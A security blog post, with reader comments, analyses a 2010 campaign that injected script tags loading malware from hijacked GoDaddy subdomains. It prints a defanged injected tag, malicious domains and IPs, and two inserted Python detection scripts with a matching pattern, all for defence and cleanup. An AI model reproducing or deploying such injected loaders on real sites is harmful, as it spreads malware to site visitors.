Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.

Malware on Hijacked Subdomains. Part 2.

   17 Jun 10   Filed in Website exploits

About a month ago I wrote about a hacker attack that used hijacked subdomains of legitimate websites to serve malware (fake anti-virus software). Most likely, the cybercriminals used a phishing attack to steal credentials for GoDaddy’s domain management control panel and then created rogue DNS records for subdomains, pointing them at hacker-controlled servers.

In that article I wondered whether that was a new trend (the use of virtually free hijacked subdomains) or just a temporary approach that wouldn’t be used anywhere else. Well, this week I came across a different malware attack that also uses hijacked subdomains of legitimate websites.

The attack itself is nothing new. It uses stolen FTP credentials to inject malicious scripts into legitimate web pages. The injected scripts look like this:

<sc ript type="text/javascript" src="hxxp://oployau .fancountblogger .com:8080/YouTube.js"></sc ript>
<!--8469f3ebb36bebb12b39b0f9e7fe5933-->

The scripts are reminiscent of many other attacks that used an nginx reverse proxy on port 8080 on compromised servers (and that is the case here too).

Script names

I checked many infected sites and noticed that the injected scripts always used the same 5 subdomains and changed the file name part of the script from site to site. They always used Internet/computer related file names, e.g.: YouTube.js, Virtual_Reality.js, Backup.js, Unfriend.js, Keystroke.js, Access.js, Technology_Services.js, Page_View.js, Gigahertz.js, Telnet.js, Data_Type.js, Paste.js, Gnutella.js, Website.js, etc.

Hijacked subdomains

The 5 subdomains are (there may be more, but I have only seen these five):

  • oployau .fancountblogger .com
  • sorydory .russellhowe .com
  • aospfpgy .dogplaystation .com
  • kollinsoy .skyefenton .com
  • temp .hbsouthmomsclub .com

Update: You can find many more hijacked subdomains in comments.

Each of them points to a different IP on a different network, and none of those IPs matches the IP (or even the network) of its second-level domain.

All the second-level domains were registered through, and are still managed via, GoDaddy. Some of them point to real, legitimate websites; others are just parked domains.

It’s clear that hackers somehow gained access to those domains’ DNS management panel and created rogue DNS records for subdomains whose existence the legitimate domain owners don’t even suspect.

oployau.fancountblogger.com. 937 IN A 78.137.161.186
sorydory.russellhowe.com. 3530 IN A 88.198.25.170
aospfpgy.dogplaystation.com. 2792 IN A 216.154.216.15
kollinsoy.skyefenton.com. 399 IN A 194.150.236.199
temp.hbsouthmomsclub.com. 1116 IN A 81.89.109.23

This is the second attack in a short time that uses this approach to get free domain names for malware distribution. I guess it is still too early to call this a trend, but it’s definitely something we should keep an eye on.

To domain owners

When was the last time you checked DNS records of your domains? Are you sure there are no rogue subdomains that criminals use behind your back? Probably it’s time to check your domain settings now. But don’t forget about phishing attacks – make sure you are logging into a genuine site of your registrar. (Check GoDaddy’s security tips)
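One way to act on the observation above (rogue subdomain records pointing at networks unrelated to the domain itself) is to diff a zone export against the apex address. This is an added example, not code from the original post; the zone snapshot is constructed from RFC 5737 documentation addresses and the /24 comparison is an assumed heuristic.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed zone snapshot in the "name. TTL IN A address" format shown in the post.
# All addresses are RFC 5737 documentation ranges; nothing here is real infrastructure.
ZONE_SNAPSHOT = """\
example.com. 3600 IN A 192.0.2.10
www.example.com. 3600 IN A 192.0.2.10
mail.example.com. 3600 IN A 192.0.2.25
oployxx.example.com. 937 IN A 203.0.113.186
parked-example.org. 900 IN A 198.51.100.5
temp.parked-example.org. 1116 IN A 203.0.113.23
"""

RECORD_RE = re.compile(r"^(\S+?)\.?\s+\d+\s+IN\s+A\s+(\S+)$")

def parse_a_records(text):
    """Return (owner_name, ip_address) pairs from dig-style A record lines."""
    records = []
    for line in text.splitlines():
        m = RECORD_RE.match(line.strip())
        if m:
            records.append((m.group(1).lower(), ipaddress.ip_address(m.group(2))))
    return records

def apex_of(name):
    """Naive apex: the last two labels (fine for .com/.org/.ru, wrong for co.uk)."""
    return ".".join(name.split(".")[-2:])

def find_rogue_subdomains(records, prefixlen=24):
    """Flag subdomains whose A record lies outside every network the apex uses.
    Post's heuristic: hijacked records pointed at networks unrelated to the apex.
    The /24 comparison is an assumption; use an ASN lookup for multi-provider setups."""
    apex_nets = defaultdict(set)
    for name, ip in records:
        if name == apex_of(name):
            apex_nets[name].add(ipaddress.ip_network(f"{ip}/{prefixlen}", strict=False))
    rogue = []
    for name, ip in records:
        apex = apex_of(name)
        if name == apex or apex not in apex_nets:
            continue  # the apex itself, or no apex address to compare against
        if not any(ip in net for net in apex_nets[apex]):
            rogue.append((name, str(ip)))
    return rogue

if __name__ == "__main__":
    for name, ip in find_rogue_subdomains(parse_a_records(ZONE_SNAPSHOT)):
        print(f"suspicious: {name} -> {ip}")
```

Export the zone from your registrar's panel (or dump it with `dig` per name) and feed that text to `parse_a_records`; anything flagged that you did not create yourself deserves a closer look.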

To webmasters

If you found one of the above scripts in your web pages (you can use Unmask Parasites to detect them), do the following:

  1. Scan your computer for malware.
  2. When you are sure it is clean, change all site passwords.
  3. Don’t save new passwords in FTP clients (unless they encrypt them with a master key).
  4. If possible, use only secure file transfer protocols (e.g. SFTP or FTPS). Plain FTP is very insecure.
  5. Remove the malicious scripts from the files on the server. Note that the scripts may also be injected into .js files. Sometimes hackers even create malicious .js files on compromised servers. If you don’t want to miss any infected files, consider removing everything and then restoring the site from a clean backup copy.
  6. If your site is blacklisted by Google, you need to request a malware review via Google Webmaster Tools (Diagnostics -> Malware). You can read more about it in my guide.
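For step 5, the stable part of the injection shown at the top of the post is the script source (a .js name fetched from a host on port 8080) followed by a comment carrying a 32-hex-digit marker. The scanner below is an added example, not code from the original post or from Unmask Parasites; the sample page, host name and marker value are constructed for the test.

```python
import os
import re
import sys

# The stable part of the injection shown in the post: a remote .js fetched from a host
# on port 8080, usually followed by an HTML comment holding a 32-hex-digit marker.
INJECT_RE = re.compile(
    r'src=["\']https?://([a-z0-9.\-]+):8080/([\w\-]+\.js)["\']'
    r'(?:[^\n]*\n?\s*<!--([0-9a-f]{32})-->)?',
    re.IGNORECASE,
)
SCAN_EXTENSIONS = {".html", ".htm", ".php", ".js"}

# Constructed sample page; the host, script name and marker are made up for the test.
SAMPLE_PAGE = (
    "<html><body>\n"
    '<script src="http://cdn.example.com/jquery.js"></script>\n'  # legitimate, port 80
    '<script type="text/javascript" src="http://rogue-sub.example.com:8080/YouTube.js"></script>\n'
    "<!--0123456789abcdef0123456789abcdef-->\n"
    "</body></html>\n"
)

def scan_text(text):
    """Return findings as (line_number, host, script_name, marker_or_None)."""
    findings = []
    for m in INJECT_RE.finditer(text):
        line_no = text.count("\n", 0, m.start()) + 1
        findings.append((line_no, m.group(1).lower(), m.group(2), m.group(3)))
    return findings

def scan_tree(root):
    """Walk a web root (including .js files, which the post says also get injected)."""
    results = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if os.path.splitext(fn)[1].lower() not in SCAN_EXTENSIONS:
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, encoding="utf-8", errors="replace") as f:
                    hits = scan_text(f.read())
            except OSError:
                continue
            if hits: results[path] = hits
    return results

if __name__ == "__main__":  # usage: python scan.py /path/to/webroot
    for path, hits in scan_tree(sys.argv[1]).items():
        for line_no, host, name, marker in hits:
            print(f"{path}:{line_no}: {host}:8080/{name} marker={marker}")
```

Run it against a local copy of the site before and after cleanup; a hit without a marker still points at the port-8080 pattern and is worth reviewing by hand.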

Have your say

Do you know any other malware attacks that use hijacked subdomains of legitimate websites? Can we call this a new trend?


Reader's Comments (11)

  1.

    Here are two more domains which have been used in this attack

    foxy.divarug .com
    blog.bigsophieblog .com

    As with the others, registration and DNS hosted by GoDaddy. While GoDaddy has a large percentage of the registration business and are a major DNS provider for low budget domains, the fact that ALL domains being used involve GoDaddy suggests that the hackers have discovered an exploit allowing them access to GoDaddy accounts (or have access to GoDaddy accounts through some other means).

    •

      I’ve also found a new hijacked domain today:
      iopap.upperdarby26 .com

      And I still think that it was a phishing attack that helped criminals get access to certain domains’ DNS records. There are many known GoDaddy phishing attacks (mainly via email spam).

      If it was some exploitable security hole in GoDaddy’s domain management service, I’m afraid we would have seen many more hijacked subdomains and altogether stolen domain names.

  2.

    I find new hijacked subdomains almost every day so I decided to post them here:


  3.

    Hi Denis,

    This seems to be part of this injection:

    http://www.sophos.com/blogs/sophoslabs/?p=10417

    pob

  4.

    It might be a trend. I also had an infected site with the same kind of scripts inserted; this one pointed to

    hxxp://pantscow .ru:8080/OASIS.js

    (no subdomain here!)

    The infected site was not hosted by GoDaddy this time, but by a company named realhosting.nl. After changing the FTP password the site was infected again, so I guess someone found an exploit to gain access to their servers as well. I informed the hosting provider…

    •

      They don’t resort to only hijacked subdomains. They also use their own domains (as they did before the subdomains).

      Again, each of them points to 5 different IPs where they set up reverse proxies.


  5.

    [...] by Oliver Day Mon, 26 Jul 2010 20:43:41 GMT Last month the Unmask Parasites blog wrote about attacks using hijacked subdomains of legitimate websites to serve badware. At the [...]

  6.

    My blog has been hit with the “this site may be harmful if you are on it” so many times within the past months that I’ve lost track. Each time I go through the whole deal that is required of us to perform. This time, however, I had help from someone who knows more about tech stuff than I do, and we found a correlation between HostGator vs. THEPLANET and the malware-hit site. It seems that THEPLANET is a server for HG, which in turn causes problems for anyone who has HG as their hosting co. Do you know any info regarding this? We went to StopBadware.org and found out about this relationship. I would appreciate it if you could explain it in an easy way for some of us to wrap our heads around. Thanks so much, JJ

  7.

    Got hit as well.

    no subdomains

    addonrock. ru/ keystroke.js
    alienware. ru/ keystroke.js

    they changed all *.js, all *.php, all *.htm files with this script

    websites which were infected were hosted by 1and1 in Germany (1und1.de)

  8.

    it was

    alienradar. ru/ keystroke.js

    not alienware. ru

    my mistake- sorry

  9.

    Recently my domain was hacked through the appending of the .htaccess file on Godaddy. It would redirect the browser to a .ru site if it’s referred by Google, Facebook, Twitter, those popular search engines. So I did a force rewrite on the .htaccess, but once or twice a week the file’s permissions get changed and the .htaccess file is appended with those redirecting codes again.

    And what is really weird is that if I make my .htaccess empty, it would redirect those referred links directly to the .ru site again.

    I contacted Godaddy several times with their online support and all I get is generic support. It seems as if the shared hosting server that I’m on is infected. I have requested the FTP log and there isn’t any log entry during the time the file was changed.

    What other file could cause the site to redirect other than the .htaccess? I have removed all files in the root directory and left just one index.php file. It still redirects me to an outside server if I change my .htaccess file to blank.